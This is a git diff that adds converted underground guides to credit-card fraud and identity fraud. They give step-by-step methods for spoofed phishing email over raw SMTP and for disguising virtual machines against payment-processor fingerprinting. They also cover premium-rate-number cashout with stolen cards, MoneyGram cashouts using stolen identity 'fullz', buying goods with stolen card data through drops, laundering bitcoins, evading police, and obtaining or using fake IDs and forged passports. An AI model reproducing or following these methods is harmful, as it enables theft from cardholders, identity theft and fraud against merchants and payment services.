RCPT TO: destination@fdsgsfdg.com +Response: 250 2.1.5 Ok +Send: DATA +Response: 354 end data with . +(paste all your data here, the one you edited with Notepad, then press Enter, put a dot (.) and press +Enter again) +Response: 250 2.0.0 Ok: queued as 43958340634 +Your fake e-mail is sent. Note that for some providers like Hotmail, if you attempt that (from Hotmail +to Hotmail), they will put it in Junk Mail because the originating IP is not one of Hotmail's servers and +they recognize it as spoofed. However if you send an e-mail to Hotmail from another server (example +@tcf.onion), it will work like a charm. For smaller messaging servers, everything will go smooth. Now +more people will fall for your scams. +Section 2.7 – Completely Spoofing Your Identity +This is about people who are serious into hiding your identity. Newbies would assume that by changing +your VPN location, you are someone new. More advanced users will say that by changing your VPN, +your Socks, and by using a completely new browser with user agent, changing fonts, resolution and +systme time, you are better. In fact, both are wrong. Payment processors and Paypal have extremely +advanced ways to fingerprint people and we will learn here how to bypass that. +What software or websites (through complex Javascript calls) can use to fingerprint you can include +motherboard serial numbers, system UUID (unique identifier), and so on. That's a lot of stuff to spoof! +To spare you the research of spoofing everything, I have prepared a small program, DMI Spoof, +included in this package. This program was written by myself and is used to modify a VirtualBox +virtual machine to make it appear completely new! +Run DMI Spoof and you will be asked for 2 parameters. +1) VboxManage.exe path. This is the full path of the VboxManage.exe file, usually located in the +same installation directory than VirtualBox. +2) Name of your VM. When you open VirtualBox, this is the name that appears in bold black +characters in the list. You know what this is. +Note that you can also supply those parameters at the command line to run it faster, the first parameter +will be the VboxManage.exe path, and the second paramater will be the VM name. It provides a faster +way to spoof everything. + +Once you supplied those 2 parameters, DMI Spoof will alter the VM to change the BIOS brand, +motherboard information and serial numbers, CPUID information and a few other parameters. You will +appear as having a completely new computer made of completely different hardware, with no way of +knowing that this has been spoofed. +Once you boot into your VM, change the following settings in Windows, as they can also be used to +fingerprint you, and cannot be altered using DMI Spoof: +– Screen resolution (you can usually drag a corner of your VM) +– Install or delete a font in the Fonts folder (font list can be found using JS) +– Change the computer name (requires reobot) +– Use Tmac to spoof the network MAC address (can be found using advanced Javascript) +– Disable Flash (some sites silently place Flash cookies on your computer) +– Change user-agent (use the User Agent Switcher extension for Firefox) +– Change VPN location or Socks proxy (this is obvious) +Once you changed everything, do not re-access your sites from the same IP than before, or you will +have to restart the whole process! +This is enough to protect you from all fingerprinting processes; for payment processors and high +security sites, this is a must. There is no such thing as “too much security”. +Note that all this stuff is equivalent to getting a new computer. You will appear as completely new and +there is no way to trace this back to the original machine. Spoofing DMI is something easier done on a +virtual machine, and if you read this chapter correctly, you know that you must always place your +carding software in a virtual machine for maximum security. +Section 2.8 – Safeguarding Your VPN +When it comes to using a VPN, many people have a sharky connection and their VPN connection +disconnects sometimes. What happens if you are using an auto-cashout script or you are logged in +using your fake username on an online shop? That's right. The connection will be established and will +reveal your real IP. For Windows 7+ users, there is a Windows-native protection you can use to avoid +such a thing. +When you connect your VPN the first time, Windows will ask you if this connection is Home, Office or +Public network. You must select Public. Then go in the Windows advanced firewall settings and follow +these steps to protect yourself: +1) Go in the “outbound traffic rules” section of the advanced configuration window. +2) Right-click on “outbound traffic rules” and select “add rule”. +3) You will be asked which type of rule you want to create. Select “program”. +4) Click on “browse” and select the .exe file of the application you want, for example Firefox. +5) Select “block connection”. +6) When asked when will the rule be applied, check “home” and “office”, uncheck “public”. +7) Give a meaningful name to this rule, for example “VPN Firefox”. +8) Create the same rule for every program you want to safeguard. +This way, all connections not on the Public domain (not made through VPN) will be blocked for the + +selected programs, while still allowing the system requests to take the standard way. If your VPN is +disconnected, you will not be able to use those programs. You should do this for: +– Firefox +– Google Chrome +– Tor Browser +– Tor Process +– VIP72 client +– Proxifier +– Pidgin +– Thunderbird +– Any other program you might judge useful. +Note that you can't just block every single packet not sent through the VPN. Many programs including +the operating system itself must communicate on the local network without restrictions, and using the +rule “block all programs” instead of selecting a program can make the system instable and have +unpredictable consequences. Also, you need to use traffic on the “Home” domain to be able to connect +to your VPN. +This ensures that your IP will never be revealed in case of a disconnection. In that case, just reconnect +your VPN and everything will continue as normal. You will not have to constantly watch your +connection status. +In case you do not know the path of the file you should choose, you can open the task manager using +Ctrl + Alt + Delete (or right-click on the taskbar and select “open task manager”), right-click on the +process and select “open file location”. This will give you the full path of the file, so you can add it to +the firewall rules. +For older Windows versions such as XP, you can use Comodo firewall to achieve the same thing, +however this is beyond the scope of this tutorial and has proven to cause system instability. The +Windows 7 native method has proven to be the most stable and most secure as of now, so enjoy your +protected system! +Section 2.9 – The 10 Most Common Mistakes +This section talks about the most common mistakes newbies make when they start carding. Some can +be fatal, other one are just not important, but it's important to understand those points. +#1 – Bragging about your stuff +When you get free stuff, do not brag to your friends, your family, or girls. You never know when +someone will be pissed at you and decide to report you. Keep it for yourself, and be quiet about it! Just +say you have a way to get cheap stuff, and it's private. That's all. +#2 – Linking to your personal life +Do not ask a friend to use his house as a drop. Do not ship to your workplace, your dad's house, or +worse, your own house! If the police shows up at your friend's house, he will rat you out for sure. Don't +trust people that much. + +#3 – Starting too big +When you first start carding, do not attack merchants like Newegg or TigerDirect. They are not easy +and they will give you a negative feeling about carding before you even get free stuff. Start small, for +example, clothes. +#4 – Using the same nickname on hacking boards and on clearnet sites +Many newbies forget that, and yes, there are probably LE officers on TCF, watching what's going on. If +they can Google your username and see your Facebook or anything else, you're fucked. Use a name +that you use nowhere else! +#5 – Responding to allegations of fraud +Sometimes, you can get caught off-balance, and for example, a shop will respond by “the order was +fraudulent, so we canceled it”. If you carded them successfully 3 times before, don't talk about it. If you +just want to show them that you owned them, it can persuade LE to track you, because you just linked +the fraudulent orders together. Just don't reply anything. +#6 – Not washing your bitcoins +If you buy (or card) bitcoins with Virwox, they can use the blockchain to trace where those bitcoins +went, and eventualy link to you. Use a service like BTC Fog to wash them and get brand new bitcoins, +not linkable to you, for your underground operations. +#7 – Talking to your partners on a traceable site +Do not use Facebook to talk to your partner about carding. Any LE officers can subpoena Facebook to +get your conversation history and catch you. Use Pidgin + OTR to encrypt your conversation, and use +VPN to connect to ICQ. Make sure you're not traceable. +#8 – Getting caught off-balance during an ATO +When you are ATOing an account, stay calm, do not get thrown off by questions. If you answer +incorrectly (because very often, they have inaccurate information), stay calm and explain yourself, +remember, the card is yours. Do not show fear, because they will catch you. +#9 – Hitting the same drop +This is pretty self-explanatory; finding drops is a pain, but make the extra effort and get a virgin drop. +There is already heat on the first place, so do not put more and risk getting caught. A drop is good for 3 +days; after that, time to move on. You can apply this principle with girls too. +#10 – Accessing your fake e-shop without VPN +When your Stripe account gets burnt and they subpoena your fake e-shop to give them the access log, +you don't want them to see your real IP and trace back to you. Always use VPN to upload files, test +your shop, and so on. + +Section 2.10 – Glossary +This is a list of common words used in the carding world, and many people are not sure of their +meaning. Here are some of them. +ATO: Account Take-Over. This is when you call the bank while impersonating the cardholder to +perform whatever operation you want on the account. +CC: Credit Card. You know what this is. +CH: CardHolder. The real owner of the card. +COB: Change Of Billing. This is changing the billing address when doing an ATO. Be careful as this +may trigger a ring to the cardholder. +CVC: Card Verification Code. Also known as CVV or CVC2, this is the 3-digit code behind the card +near the signature panel (4 digits for Amex cards). +DL: Driver's License. Used for verification purposes. +DOB: Date Of Birth. You know what this is too. +MCSC: MasterCard Secure Code. Also known as MSC, this is the security mechanism that asks for +verification questions during an online purchase made with MasterCard. +RC: RingCentral. Your favorite source for burner phones. +SSN: Social Security Number. You know what this is. +VBV: Verified By Visa. Same thing than MCSC but for Visa cards. + +Conclusion +I hope this guide was useful to you. I tried to put as much as my knowledge as possible to help fellow +carders in the underground world. Use any part you might find useful to you and try to hit for big. +Again, thanks to everyone who bought the guide, and if you have any question, post in the forums so +everyone can see question and provide better help. +I do not like to be PM'd with carding questions; the reason is that sometimes there might be a member +knowing more than I do on a particular topic and if everyone can see your question, you can get more +help, and it benefits to all the community. This is why I encourage you to make your question public. +Also, I do not provide personal support on ICQ. This guide has sold in over 300 copies and if I would +help everybody who bought it, I would spend all day doing that. This being said, thanks for buying this +guide, now time to make money! +G + +The Journey Through Knowledge +Continues +I strongly recommend that you read and reread the manuals below and then make +money.They cost $ 10 each one of them! +Login to Hacked Paypal Accounts With 99% Success +Paypal:Receive and Cashing Out Guide diff --git a/Cashing Out (UK)_txt.md b/Cashing Out (UK)_txt.md new file mode 100644 index 0000000..9e23e83 --- /dev/null +++ b/Cashing Out (UK)_txt.md @@ -0,0 +1,42 @@ +# Cashing Out (UK) + + +--- + +Things Needed - 1 Premium Rate Number (we will be carding one) +2 O2 Sim Cards - Buy/Card in bulk from ebay +3 Mobile phone - Unreg buy from Tesco +4 Enough UK CC's For the amount of sim cards + +Total investment about £30-40 + +Ok to start go here http://www.phonenumb....m-rate-numbers, and +card a pre-recorded premium rate number. + +On the next page select basic control panel + +This will take 24-48 hours before becoming live. Dont worry about charge back or anything it never happens. + +Now the part where you can start making money. +Take your unregistered phone and insert a new O2 Sim card. +Call 444 and select topup by credit card and use a UK CVV +Top up £30 and put the phone down call again and top up another £10. +Call your premium rate number you setup above and let it run till the credit runs out +put a new sim card in and repeat. + +just to give you an idea of money you can make + +# 48 calls per day X 20 min call x £1.00/min payout x 30 days = £28,800 per month +# 4 calls per day X 20 min call x £1.00/min payout x 30 days = £2,400 per month + +Now the way UK premium rates work is that they have a 3 month charge period. +Which means the company get invoiced and paid by BT every 3 months. +BUT they pay you every 50 days, so even with chargebacks you still get paid all money +Also charge backs have to go through 3 companies, O2 --> BT --> Prem Company (takes time) +After your first 30 days setup a new one and work on that. +then you do this every 30 days. +Simple but effective. + +NOTES : add about CC's -- should buy use for £40 and resell same day for 0cost cc + ++1 if you want to see more tutorials diff --git a/Cashout CVV To Money Easily - Private method_pdf.md b/Cashout CVV To Money Easily - Private method_pdf.md new file mode 100644 index 0000000..82c7566 --- /dev/null +++ b/Cashout CVV To Money Easily - Private method_pdf.md @@ -0,0 +1,48 @@ +# Cashout CVV To Money Easily - Private method + + +--- + +Cashout CVV To Money Easily - Private method +-Now all you need is a fresh good balance Hacked and strong CVV. and that is the most important part. +-Pick up a full detailed CVV , THE MOST IMPORTANT IS THE DOB AND SSN. Next, +run a detailed background search on the person you are using his SSN and DOB. +and YOU CAN DO IT By buying the background , search online. +Now you start the Transfer online, +Where is the trick? +if you have a good cvv, very good, u can use the card number, exp date, and the cvv code only, Then u use +the full detail of the other person you have the info on, u can use info of diff person and card detail of diff +person now at the end of the transaction u will be asked secret question abt the person, that is where u use +the details u buy from search "engines onlineBookmark" use socks from winsocks,u can buy from inforegistry +or intelegator and many other sites. +I used to cash out 200 to 300 from each card as a maximum to remove suspection and guarantee trans. +To clear it again well, i Edited everything today so there's nothing left missunderstood please Read carefully: +"-Get fullz +-Get a site u can register to check background of the person holding the fullz. +Now start the online transfer process. +"But the most important thing to know is that even if the card details on the fullz is dead, no worries. Just +make sure the ssn+dob matches with the name on the fullz. +-Use the details on the fullz to fill up the details on the money gram website" +When u get to the payment side: +U can now fix in only the card details on a very good and valid cvv +Just the number, exp date and cvv2 code. +As i have mentioned you can use the original full details if the ccv is not DEAD! +- If dead ! Sure, Of a different card but remember the ssn and dob of original card! +Now money gram does not match the card details with the details used. +If they are not dead....best! +- At the last stage u will be asked security questions about the original card since u used it with the ssn and +dob. +That is where u will need the website to check background. +-Moneygram will charge the card separate but will authorize payment if only u answer the security question +right. +So for example: if u have the full details of ur brother in USA, u can use his details but use a different card to +pay When they ask the security question, u call him and he gives u the correct answer. +despite calling your brother for infos ,buy from Info registry ,Intelegator, +just google Background checker. +I like visa. Use a visa bin that you can create the authorization password urself +Cuz with visa, if the authorization password is correct it pays directly +U pay online To intelegator Or any website that checks background +U type the name of the original card holder And you search + +Like when u check the cvv you bought before you use , sometimes the billing adress is not correct so i use the +name to search." diff --git a/Cashout cc_cvv or fullz-online shopping_pdf.md b/Cashout cc_cvv or fullz-online shopping_pdf.md new file mode 100644 index 0000000..f77842d --- /dev/null +++ b/Cashout cc_cvv or fullz-online shopping_pdf.md @@ -0,0 +1,76 @@ +# Cashout cc cvv or fullz-online shopping + + +--- + +Cashout cc,cvv or fullz-online shopping +Guys please remember that this is a free access made up for educational propose ONLY +and I’m not responable for the way in which you will use the information shared +can be used by someone else in different illegal ways. +Hello carders!I hope you all doing grate and are safe!Thank you for showing your +interest for Carding School.I received all your mails and answer to all of you.I hope +the best advice.I just received a mail from some of you with a request to write +mail but I thought that this answer may be useful for some other carders so here it is. +How to cash out cc and cvv’s using online shopping method: +1.The online shopping may look like a simple way to cash out cc//cvv’s but before try +to buy your first item online maybe you should give some minutes to read what you need +and how to do it.Of course you will need a cc/cvv/full .I personal recomand to buy +cvv’s or fullz and to ask your provider if they came with DOB (date of birth).Now if +you have your cvv you must (2) +2.Chose a web shop where you will like to try your luck and then you are ready to go! +STOPPP!!!! +The cc/cvv and the web shop are the main steps but they are not enough for carding! +When you want to buy some item using cvv you must think where you will request the +delivery of it.You can send something buy illegal to you home unless you want to spend +some time in jail.And you don’t want this happen,right? +This mean that you will need a drop for the stuff that you will buy using a cvv.It’s +called drop a person/place where you will request the delivery of the goods you will +buy using cvv.So before use a cvv to buy stuff online search for a drop.If you ask me +"Dumbby where can I find a drop?",then maybe I will get angry and send you +beeeeeeep!!!I just joke guys,carding is a serious business but this not mean that we +can have fun and learn in the same time!Ok,back to the serious part of post,you can +find drops using social network sites,via Y!M (yahoo messenger) etc.Want me to write +about finding a drop with yahoo messenger?Just send a mail or post a comment. +Once you find a drop for the goods you may try to buy something in the web shop you +chose but be sure that the web shop you chose allow the delivery of the goods to some +other address different that the cvv address.Read the policy of the site to know +exactly their rules,the delivery terms and so on. + +One more thing that you must know about drops.You can never be sure about them unless +for yourself you will buy 2 mp4’s ,one for you and one for the drop.Also many times +happen that the drop will recive the 2 mp4’s and send you nothing.....rip you.This is +the part of the deal that depend only for luck. +This been said lets have a review over the up written +So for cash out cvv’s you must considerate +good you will buy) +2.find a real cvv provider and buy some cvv’s or try your luck and ask for a free +sample but not make this a habit ,if you find a real provider don’t change your e-mail +and beg for free stuff every day! +3.find a web shop where you can use the cvv which accept the delivery to other address +that the address of cvv. +Once you have a drop,cvv’s and you chose a web shop try your luck . +Before start carding ,connect your VPN and apply SOCKS on Mozilla Firefox +browser.Chose SOCKS from the same city or even near to the city where the real cvv +carding.Act normally as a real costumer.Go on the web shop page,read the terms and +the "check out"/"buy now" link.Then you should be redirected to the payment form.Chose +the payment for using credit card and select from the list the type of card you will +information for your cvv(name,credit card number,credit card expire date,DOB-date of +birth and so on).Then you should see the delivery address and the name of receiver +,here is where you have to fill up the information of your drop,it’s name and full +support the cost of the goods your transaction will be successful you will receive a +confirmation mail from the web-shop and your drop will receive the good waiting the +period of time necessary to the shipping and handling.Now pray that your drop will +use a cc/cvv/full to buy stuff online! +I hear you screaming that you follow this steps before but your transaction was +and alive cvv.I know this happen many times mostly to those of you which may fraud the +site before.But this not happen only if you anterior transaction were frauds but also +happen in some other situation.So again review! +You have a drop,a fresh and working cvv,a web shop but still you can buy nothing +and try to online shopping using a cvv from Y country.Well for this exist also +solutions!If you want me to continue this post about how to make a site to accept your +transaction even if you are from China and try to buy online something using USA cvv +then all you have to do is to send me a mail at cardingschool@hotmail.com or to post a +comment with your request on this post. + +I really hope that this will help some of you which are new came in the carding +world.Stay safe and I’ll see you next time! diff --git a/Change-Your-Identity-2011a_pdf.md b/Change-Your-Identity-2011a_pdf.md new file mode 100644 index 0000000..7848989 --- /dev/null +++ b/Change-Your-Identity-2011a_pdf.md @@ -0,0 +1,12787 @@ +# Change-Your-Identity-2011a + + +--- + +Change Your Identity 2011 +Please Note: This single document +contains your “Change Your Identity” +report PLUS all 3 bonus reports. +© Copyright 2011, Ariza Research, All rights reserved - ABP +Reproduction in any form is prohibited without written permission. + +"How to Change Your Identity" +By Jim and Susan Petersen +© Copyright 2011 – Ariza Research – All Rights Reserved - ABP +Any attempt to violate this copyright will result in aggressive +prosecution under The Digital Millennium Copyright Act of 1998. +Revision: 1-11 +Disclaimer: +Do not break the law. The information in this publication is for +informational or entertainment purposes only. Laws regarding the +acquisition and use of identity documents are constantly changing. +Before attempting to use any of the techniques or tactics discussed in +this publication, always consult an attorney who is familiar with +applicable laws in your area. Due to recent legislation we are unable to +provide personal assistance of any kind. We do not deal in illegal +documents or services. +Code: 8203f +© Copyright 2011, Ariza Research, All rights reserved - ABP - 2 - +Reproduction in any form is prohibited without written permission. + +Table of Contents +2011 Updates 4 +Chapter #1 Recent Developments 34 +Chapter #2 The “Internet” Method 49 +Chapter #3 The “Living Dead” Method 56 +Chapter #4 The Classic “Ariza” Method 60 +Chapter #5 The “Foreign Citizenship” Method 93 +Chapter #6 The “Camouflage Passport” Method 96 +Chapter #7 The “Ghosting” Method 103 +Identity Theft Types 108 +Changing Your Social Security Number 111 +Fake ID 118 +Paper Tripping 120 +Using Mail Drops 122 +Identity Theft Basics 129 +Medical Records 130 +Old Social Security Cards 134 +Advanced Privacy Tactics 136 +College Degrees 156 +Avoiding Process Servers 157 +Working “Off the Books” 158 +Passports 161 +Buying a Car 164 +Pre-Identity Changing Planning 165 +Witness Protection Program Details 167 +Re-entering the U.S. 176 +Baptismal Certificates 179 +Employment References 181 +Banking Security 182 +Offshore Strategies 183 +Travel Considerations 196 +Irish Citizenships/Passports 198 +Adoption Tactics 199 +Wealth Mobility 201 +French Foreign Legion 206 +How They Find Us 210 +© Copyright 2011, Ariza Research, All rights reserved - ABP - 3 - +Reproduction in any form is prohibited without written permission. + +Updates: +2011 Update: +The very latest information on Real ID (as of December 2010) +shows that the following states are still steadfastly refusing to +cooperate with the new law: +Montana +Oklahoma +Maine +South Carolina +Here are other states that are dragging their feet and on the fence +and in the end may go along or fight Real ID: +Florida +Georgia +Mississippi +Louisiana +Texas +Missouri +Tennessee +North Carolina +Virginia +West Virginia +Michigan +Wisconsin +Maryland +Washington DC +New Jersey +Connecticut +Rhode Island +As for the new EVVE (Electronic Verification of Vital Events) +searchable database that allows online verification of birth +certificates nationwide – the following states are currently up and +running on the system: +Oregon +California +Utah +Arizona +Montana +Colorado +North Dakota +South Dakota +Kansas +Oklahoma +Minnesota +© Copyright 2011, Ariza Research, All rights reserved - ABP - 4 - +Reproduction in any form is prohibited without written permission. + +Iowa +Missouri +Arkansas +Michigan +Indiana +Ohio +Kentucky +Mississippi +Alabama +Georgia +Pennsylvania +Washington DC +Maryland +Delaware +Connecticut +Rhode Island +Massachusetts +And New York City (but not the entire state) +The following states are not yet online +Maine +Vermont +New Hampshire +New York +West Virginia +Virginia +North Carolina +South Carolina +Tennessee +Florida +Alaska +Louisiana +Texas +New Mexico +Nevada +Nebraska +Wyoming +Idaho +Washington State +Puerto Rico +US Virgin Islands +© Copyright 2011, Ariza Research, All rights reserved - ABP - 5 - +Reproduction in any form is prohibited without written permission. + +Bouncer Update +Bouncers at some of the larger bars located near college +campuses have begun to equip themselves with handheld devices +that allow them to access the Internet in real time. +They’re doing this so they can check out the Facebook, MySpace +and other social site pages of customers to help them determine +the their age before they allow them to enter. +If you offer them a fake ID showing your age as over 21 and they +discover that you are in fact younger, you may be in trouble +though very few of the bouncers I’ve talked to were willing to +physically restrain people from leaving the scene. The smartest +approach is to abandon the fake ID and quickly depart. +Also, the police officers I’ve chatted with more often than not say +that policing bar customers is not their concern but instead is the +responsibility of the bar staff. +But I should add a stern warning – never, ever consider traveling +from one country to another with fake ID in your possession. Many +governments will regard anyone who holds fake ID as a potential +terrorist and that could cause you some very serious legal +problems. +Lost License Rules +Several states have become aware of a problem with their drivers +license use. Under existing rules anyone holding a valid drivers +license can quickly and easily report their license lost and obtain a +duplicate for a small fee. +Some students are using this loophole to obtain a second license +which they can lend to others for underage drinking purposes. +Some states are considering changing their rules but for now this +ploy appears effective. +Some bouncers are demanding a second form of ID with your +name on it before allowing entry. They’ve grown suspicious of +using the drivers license as the sole form of ID. So you might want +to have some sort of second ID with you in case a bouncer asks +for it. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 6 - +Reproduction in any form is prohibited without written permission. + +Bouncer tricks: +They may ask “when did you graduate high school?” +If you hesitate in your answer – they’ll assume you’re lying. +Many bouncers check the height listed on the license and +compare it to how tall you appear. +If your Facebook picture doesn’t look like you do now – +that’s a problem. A bouncer will assume you’re not who +you claim to be. +They’ll ask what your middle initial stands for. If you can’t +answer quickly and smoothly, he’ll assume you’re lying. +If you buy a fake ID be sure it includes the usual ultraviolet +light text. Some states have hidden text across the face of +the license that suddenly appears when an ultraviolet light +is shined on it. For example in Pennsylvania the letters +“PA” appears splashed across the face of the license in +ultraviolet reactive ink not visible to the naked eye. +Some of the very largest bars are now paying off-duty city +cops to stand by their door as a deterrent to fake ID use. +I’m sure you can find a smaller, less well guarded drinking +establishment. +Many bars are much more lenient earlier in the day. Later +in the evening the real bouncers show up and clamp down +on admissions. Perhaps getting in around supper time and +staying might help you avoid strict scrutiny. +Guys have the advantage when it comes to passing +themselves of as someone else. They can grow beards, +moustaches and lose and gain weight much more easily +than women. +Women only have hair color to play with - their facial +features remain the same. +Many states include the last two digits of your birth year +into their drivers license number. Check around the +Internet for the latest on this as it changes from time to +time. Bouncers know the details and use it to help them +determine our true birth date. Modifying the date on your +license isn’t enough. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 7 - +Reproduction in any form is prohibited without written permission. + +E-Verify +The E-Verify system is supposed to help employers screen out +illegal alien employees but the system is about as air-tight as a +sieve. +If a worker just makes up a phony social security number and +attempts to work, he’ll quickly run into problems. But if the worker +has the name, birth date and social security number of a live, +breathing U.S. citizen, they’ll probably have few problems. +That’s why stolen documents are sold on the streets of towns near +the Mexican border. If they’re backed up by official government +records – they are effective and to an illegal immigrant worth their +weight in gold. +Stolen identity documents are stolen, sold on the streets or more +likely “borrowed” from friends. +Obtaining Fake ID Overseas +If you stroll along Kao San Road in Bangkok, Thailand you’ll no +doubt notice all the various vendors of fake ID. It’s become a +major industry there. +They offer not only US and European drivers licenses but a host +of other student IDs and even FBI and CIA identification! They +offer airline identification badges, International drivers licenses in +many different languages and even Interpol and employee +identification for a host of international corporations and other law +enforcement agencies! +They even sell Mastercard and Visa credit cards and many +different kinds of counterfeit currency (including US) but only a +fool would get involved in that kind of thing. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 8 - +Reproduction in any form is prohibited without written permission. + +Need a college degree from Harvard or Princeton or even Oxford +or Cambridge? No problem, they have you covered. +Prices are amazingly cheap (around $40-100 US), no doubt +caused by all the competition. How is the quality? I’ve had mixed +reports as to the effectiveness of the magnetic strip, bar code and +other enciphered data included on many licenses. +Also, Bangkok is a major market for foreign passports. But know +this – should you go out shopping for a passport you’ll be dealing +with some very hard people – gang members. +I myself have been approached while in Bangkok by street people +who wave a thousand dollars US in your face (or more) and offer +to “buy” your US passport. They tell you all you have to do is go to +the U.S. embassy and get a replacement – no problem. +But since Thailand is such an active passport market you can +expect to subjected to considerable scrutiny before being handed +a new document. +When you stop and think about it, a phony passport can be very +useful anywhere in the world – except in the country of issue. You +can use a purchased British passport for all sorts of purposes but +never hand it to any British official and don’t even think about +trying to enter Great Britain with it. You’ll be quickly arrested and +jailed. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 9 - +Reproduction in any form is prohibited without written permission. + +As of now (2011), the various European countries all maintain +carefully policed and updated databases containing any and all +stolen or lost passports. But EU countries do very little information +sharing so phony passports can be useful anywhere outside the +country of issue. +One note about fake ID in Thailand – though the fake ID business +has been going on for some years now it may be closed down at +any point in the future. +It all began way back over 30 years ago when small stalls sold +student ID cards to foreigners who used them to get student +discounts on international flights. And it grew from there. The one +thing you can’t buy is any kind of Thai ID document or anything in +the Thai language. The local police won’t allow it. +You know that politicians and law enforcement types are getting a +cut of the profits but in the future the higher level leaders may +come to feel that the profits aren’t worth the heat and the whole +operation may vanish. Just be aware that this can +happen. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 10 - +Reproduction in any form is prohibited without written permission. + +Thai gangs hire hotel workers who will steal any kind of document +you leave in your room – including your passport. The gangs +reward them with huge cash fees so if you travel to Bangkok, +invest in a money belt and keep your valuables and your passport +strapped to your belly during you entire trip. +One travel tip you should heed. Before you leave on any kind of +foreign travel, have a photocopy made of the inside two pages of +your passport and keep that in your pocket. +Should your passport be stolen it will take you several days to get +a replacement. But if you have the copy listing all the numbers +contained in your passport, you can get a replacement in a matter +of hours. +From what I’ve heard in Asia, the Philippines and Cambodia have +active fake ID and passport markets though I have no personal +experience of either of them. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 11 - +Reproduction in any form is prohibited without written permission. + +Facial Recognition +Minnesota scanned 11 million drivers license photographs and +identified 1,200 pictures that they deemed to be improper and the +licenses were all cancelled. One women had six different licenses +under six different names! +Warrantless Searches of Credit Card +and Loyalty Card Transactions +As of the summer of 2010 the federal government now feels free +to track and monitor personal credit card, rental car, calling card +and grocery store loyalty card records of private citizens – without +bothering with those silly warrants or court orders. The feds call +these actions “Hotwatches”. +The Truth About Those Airport Body Scanners +Why is the government so eager to put full body scanners in all +our airports? Former Homeland Security boss Michael Chertoff’s +lobbying firm “Chertoff Group” represents OSI Systems who is +licensed to sell full body scanners to the TSA (Transportation +Security Administration). +OSI makes the Rapiscan machine. The CEO of OSI is an insider +who recently accompanied Barack Obama during a recent +presidential trip to India. As a result of that trip India is now buying +scanners for their airports. +To encourage American passengers to use the scanners, which +will no doubt promote the sale of even more scanners, those +freedom-loving passengers who decline to be radiated are now +required to be groped, including their genitals as a form of +punishment. +Keep all this corruption in mind the next time the TSA guy is +poking is fingers into your private parts. It’s all about money folks. +Homemade Fake ID Book +If you’re interested in making your own fake ID but need a source +of super-detailed information on which printers to use, which inks, +which paper and which software, get a copy of the book “Secrets +of a Back-Alley ID Man” by Sheldon Charrett. +The book isn’t up to date as it was written way back in 2001 but it +does contain a wealthy of real-world information on how to create +extremely sophisticated fake ID. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 12 - +Reproduction in any form is prohibited without written permission. + +The book provides detailed guidance on such subjects as +holograms, bar codes, and lamination. It also includes details on +how to create high-quality birth certificates (including a very +interesting and revealing technique for creating raised seals.) +The book is available on Amazon but if they should drop it, you +can always try bookfinder.com for a used copy. They list over a +dozen different used book sources for used copies. +Underage Drinking and Fake ID +A decade ago getting into a college area bar was child’s play. Just +work up some sort of ID on your computer and you were home +free. But today with handheld terminals and access to the Internet +all over the place the market for fake ID has changed. +Now customers are demanding (and often getting) much higher +quality fake ID. The shoddy, old homebrew fake ID is a thing of +the past. +If you’re attending a university chances are that your best source +of fake ID is someone you already know. Ask around – particularly +the 17-20 year old college girls. Many of them know where good- +quality fake ID can be had. +Pass ID +When the Real ID act was first announced it looked like the +process of creating a new identity was about to become much +more difficult and involved than in the past. +Under this new law any identity document you provided when +applying for a driver’s license would have to be verified with the +issuing agency before it could be accepted. If it couldn’t be verified +– you didn’t get your license. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 13 - +Reproduction in any form is prohibited without written permission. + +If your birth certificate was verified, a digital image of the +document would be created and placed in a massive new +nationwide database where any government official could perform +searches for whatever reason they found compelling. (It would +only be a matter of time before commercial firms would have +access, not to mention identity thieves.) +Under such an air-tight system how could you use a forged birth +certificate to create a new identity? Forged documents simply +wouldn’t work any longer. +Happily the government overreached. They badly underestimated +the public’s outrage at the very idea of their drivers license +becoming a de facto national ID card. They underestimated the +financial costs that would be dumped on already financially +strapped states. And lastly they ignored the massive technological +challenge such a system would present. +And then there are the privacy issues. Over a dozen states have +passed legislation delaying or prohibiting their participation in the +Real ID system until privacy protections could be added. Since the +feds have little or no interest in your privacy that day will surely +never dawn. +So now the whole Real ID project is mired in confusion. The act +remains law and has not as yet been repealed. But due to all the +delays and confusion it should come as no surprise that the ACLU +has officially pronounced the Real ID law dead and buried. +But the feds are nothing if they’re not persistent. The White House +tried to blackmail the Congress into passing a watered down +alternative law called Pass ID. Since the old Real ID law was +scheduled to go into effect on Jan 1, 2010, the feds hoped the +looming deadline would build a fire under the Senators and force +their hand. +I’m happy to report that their ploy didn’t work. The Senate was far +too busy with health reform to worry about Pass ID. As a result it +languished. +So the feds backed off and once again issued yet another +extension. As of this date (January 2010) not one single state is in +full compliance with the Real ID act. Not one. +Mississippi has been chosen by homeland security as a “lead hub +state”. (Florida and Wisconsin are also lead states) I suppose they +chose Mississippi because it has relatively few drivers. Imagine +trying to get such a massive project off the ground in California or +New York. Yet even this state hasn’t yet fully complied with all the +requirements of Real ID. +© Copyright 2011, Ariza Research, All rights reserved - ABP - 14 - +Reproduction in any form is prohibited without written permission. + +Is Real ID truly dead and buried? Well yes and no. It’s dead and +will probably be replaced by Pass ID sometime next year. But +there’s a wild card we must keep in mind. +If there is a terrorist attack, in the wake of that attack you can bet +your life Real ID will be quickly resurrected, many obnoxious new +provisions added and then the whole thing will be shoved down +our throats in record time – well before the public panic subsides. +Side Note: When the government wants to change +something in a radical way that will under normal +circumstances ignite public resistance, they need to first +create some chaos because it’s only during periods of +panic and upheaval that the government has a free hand +to do as it pleases. That’s why after a terrorist attack when +people are in full panic mode the government will act and +act quickly to put in place the organs of a genuine police +state. For more information on how this principle works +read Naomi Klein’s excellent book “The Shock Doctrine”. +After a host of delays and extensions the “final” date for full +compliance with the new Pass ID system is May 10, 2011. But +based on past performance I wouldn’t be at all surprised if this +date too is pushed back even further. +Cross Referencing Births and Deaths +For ages now government officials have longed for a database +that would cross reference births with deaths making it impossible +for an individual to resurrect a dead person’s identity. +Fortunately it remains but a dream. In some states the births and +deaths have been cross-referenced but only for those individuals +who died in the same state in which they were born. If the birth +and death locations were in different states as they often are, +there is no real cross-referencing. +Also, since many births and deaths are never officially registered, +this kind of system remains a pipe dream. +Until recently the people who run vital records offices never had to +concern themselves with issues of national security. Now they’ll +have to adjust to their new responsibilities. +© Copyright 2011, 